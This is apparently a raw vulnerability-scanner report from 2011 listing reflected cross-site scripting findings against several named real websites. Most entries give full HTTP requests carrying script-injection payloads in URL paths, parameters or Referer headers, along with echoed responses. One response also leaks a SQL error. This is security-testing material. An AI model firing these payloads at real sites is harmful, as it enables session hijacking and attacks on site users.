GET /wp-content68e96"><script>alert(1)</script>5199d6c8bfe/plugins/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56cc7"><script>alert(1)</script>6a526b333db was submitted in the REST URL parameter 2. This input was echoed as 56cc7\"><script>alert(1)</script>6a526b333db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins56cc7"><script>alert(1)</script>6a526b333db/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c6e"><script>alert(1)</script>2bc8a2eddd7 was submitted in the REST URL parameter 3. This input was echoed as f2c6e\"><script>alert(1)</script>2bc8a2eddd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-directf2c6e"><script>alert(1)</script>2bc8a2eddd7/modules/tracker/tracker.php?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8c"><script>alert(1)</script>4a58cf6c2e9 was submitted in the REST URL parameter 4. This input was echoed as 99c8c\"><script>alert(1)</script>4a58cf6c2e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules99c8c"><script>alert(1)</script>4a58cf6c2e9/tracker/tracker.php?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ba5"><script>alert(1)</script>5b5a6145b4a was submitted in the REST URL parameter 5. This input was echoed as a6ba5\"><script>alert(1)</script>5b5a6145b4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules/trackera6ba5"><script>alert(1)</script>5b5a6145b4a/tracker.php?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6255"><script>alert(1)</script>471cc409191 was submitted in the REST URL parameter 6. This input was echoed as e6255\"><script>alert(1)</script>471cc409191 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/oiopub-direct/modules/tracker/tracker.phpe6255"><script>alert(1)</script>471cc409191?pids=0|8 HTTP/1.1 Host: www.digitalbond.com Proxy-Connection: keep-alive Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af64a"><script>alert(1)</script>a0e25d7d8ae was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea01"><script>alert(1)</script>c5404c339c7 was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e687"><script>alert(1)</script>67e9ee1a59a was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the city request parameter is copied into the HTML document as plain text between tags. The payload eb7a1<script>alert(1)</script>1db7d40c8bd was submitted in the city parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /updateCity.html?city=Albuquerqueeb7a1<script>alert(1)</script>1db7d40c8bd HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) X-Requested-With: XMLHttpRequest Accept: */* Cache-Control: no-cache Host: www.insideup.com Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 02:15:36 GMT Server: Apache/2.2.9 (Fedora) Content-Length: 58 Connection: close Content-Type: text/html; charset=UTF-8
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac1"><script>alert(1)</script>bf0484e3881 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8809</script><script>alert(1)</script>18e974c6791 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1deb9<script>alert(1)</script>a999c03644a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico1deb9<script>alert(1)</script>a999c03644a HTTP/1.1 Host: www.jotform.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.6.32 Date: Tue, 19 Apr 2011 20:01:53 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.2.6-1+lenny9 Status: 404 Not Found Vary: Accept-Encoding Content-Length: 251
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL "favicon.ico1deb9<script>alert(1)</script>a999c03644a" was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eb97<script>alert(1)</script>b8575cf51d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /form3eb97<script>alert(1)</script>b8575cf51d4/2910946098 HTTP/1.1 Host: www.jotform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.6.32 Date: Tue, 19 Apr 2011 19:47:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.2.6-1+lenny9 Status: 404 Not Found Vary: Accept-Encoding Content-Length: 255
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL "form3eb97<script>alert(1)</script>b8575cf51d4/2910946098" was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c7d"><a>500034c1e00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htmf3c7d"><a>500034c1e00 HTTP/1.1 Host: www.lesechos.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c52a%3balert(1)//90d60205d5c was submitted in the lhnid parameter. This input was echoed as 8c52a;alert(1)//90d60205d5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12888c52a%3balert(1)//90d60205d5c&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60bf4"%3balert(1)//82a7cbbe680 was submitted in the lhnid parameter. This input was echoed as 60bf4";alert(1)//82a7cbbe680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=128860bf4"%3balert(1)//82a7cbbe680&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepeats=0;
function pa ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|128860bf4";alert(1)//82a7cbbe680|4/19/2011 4:12:32 PM' /> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23e8b'%3balert(1)//cf95cc40312 was submitted in the t parameter. This input was echoed as 23e8b';alert(1)//cf95cc40312 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f23e8b'%3balert(1)//cf95cc40312 HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f23e8b';alert(1)//cf95cc40312'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=-1; InviteRepeats=0;
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8f07c%3balert(1)//96a0de8e20 was submitted in the zimg parameter. This input was echoed as 8f07c;alert(1)//96a0de8e20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=598f07c%3balert(1)//96a0de8e20&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E921665f2e0e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; if (typeof lhnInstalled !='undefined'){lhnTrack='f'} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=-1; InviteRepeats=0;
The value of the AttorneyID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b151a"><script>alert(1)</script>bae38c8c76f was submitted in the AttorneyID parameter. This input was echoed as b151a\"><script>alert(1)</script>bae38c8c76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /attorneys.php?AttorneyID=79b151a"><script>alert(1)</script>bae38c8c76f HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com/attorneys.php?letter=K User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on ...[SNIP]... <a href="vcard.php?AttorneyID=79b151a\"><script>alert(1)</script>bae38c8c76f" title="V-Card" id="vCard"> ...[SNIP]...
The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 9abcc<a>6b16b1680ee was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careers.php?CategoryID=239abcc<a>6b16b1680ee HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com/careers.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
error: Unknown column '239abcc' in 'where clause' | 1054<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=239abcc<a>6b16b1680ee <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> ...[SNIP]...
3.175. http://www.southparkstudios.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.southparkstudios.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731a"><script>alert(1)</script>9dbbd360ab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e731a"><script>alert(1)</script>9dbbd360ab1=1 HTTP/1.1 Host: www.southparkstudios.com Proxy-Connection: keep-alive Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66255"><script>alert(1)</script>8d642b71193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582b6"><script>alert(1)</script>0bf5c8d2bb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 480f0"><script>alert(1)</script>6f8e9ffc984 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb000"><script>alert(1)</script>49a8f150b11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.180. http://www.southparkstudios.com/account/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.southparkstudios.com
Path:
/account/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc6b"><script>alert(1)</script>4d6c7d9ba48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15540"><script>alert(1)</script>f37e55f8e40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clips15540"><script>alert(1)</script>f37e55f8e40/360434/god-bless-you-captain-hindsight HTTP/1.1 Host: www.southparkstudios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f9a"><script>alert(1)</script>3282301e834 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clips/36043422f9a"><script>alert(1)</script>3282301e834/god-bless-you-captain-hindsight HTTP/1.1 Host: www.southparkstudios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a395"><script>alert(1)</script>b55c0389c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico9a395"><script>alert(1)</script>b55c0389c3b HTTP/1.1 Host: www.southparkstudios.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ak-mobile-detected=no; mbox=check#true#1303242692|session#1303242631302-17636#1303244492; s_nr=1303242631335; s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48885"><script>alert(1)</script>6c94495e35f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900ab"><script>alert(1)</script>cbc1985aaa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b73f"><script>alert(1)</script>5e9dd41d598 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92585"><script>alert(1)</script>16db96cd4bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dd0"><script>alert(1)</script>820d596d17d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dded6"><script>alert(1)</script>df8005b0ae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d752"><script>alert(1)</script>909260ee294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.191. http://www.southparkstudios.com/guide/episodes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.southparkstudios.com
Path:
/guide/episodes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c825"><script>alert(1)</script>744c18b4672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f7a"><script>alert(1)</script>3286600b94e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519b1"-alert(1)-"9a5bdb36e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d42d"><script>alert(1)</script>0af933f87e2f07608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
